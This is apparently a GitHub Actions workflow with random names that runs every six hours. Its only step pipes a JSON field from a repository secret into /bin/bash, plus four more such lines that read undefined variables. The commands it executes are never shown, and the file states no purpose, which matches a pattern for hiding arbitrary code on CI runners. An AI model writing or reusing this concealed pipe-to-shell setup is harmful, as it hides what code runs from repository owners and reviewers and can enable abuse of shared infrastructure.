name: jaijkx
on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jaijkx
        env:
          iqebc62335: ${{ secrets.iqebc62335 }}
        run: |
          echo $iqebc62335 | jq -r .rw603 | /bin/bash
          echo $yayg145 | jq -r .watk95 | /bin/bash
          echo $vsmr6759 | jq -r .xetnd066 | /bin/bash
          echo $uxbwb141 | jq -r .bcn65 | /bin/bash
          echo $n03 | jq -r .fqsu165 | /bin/bash

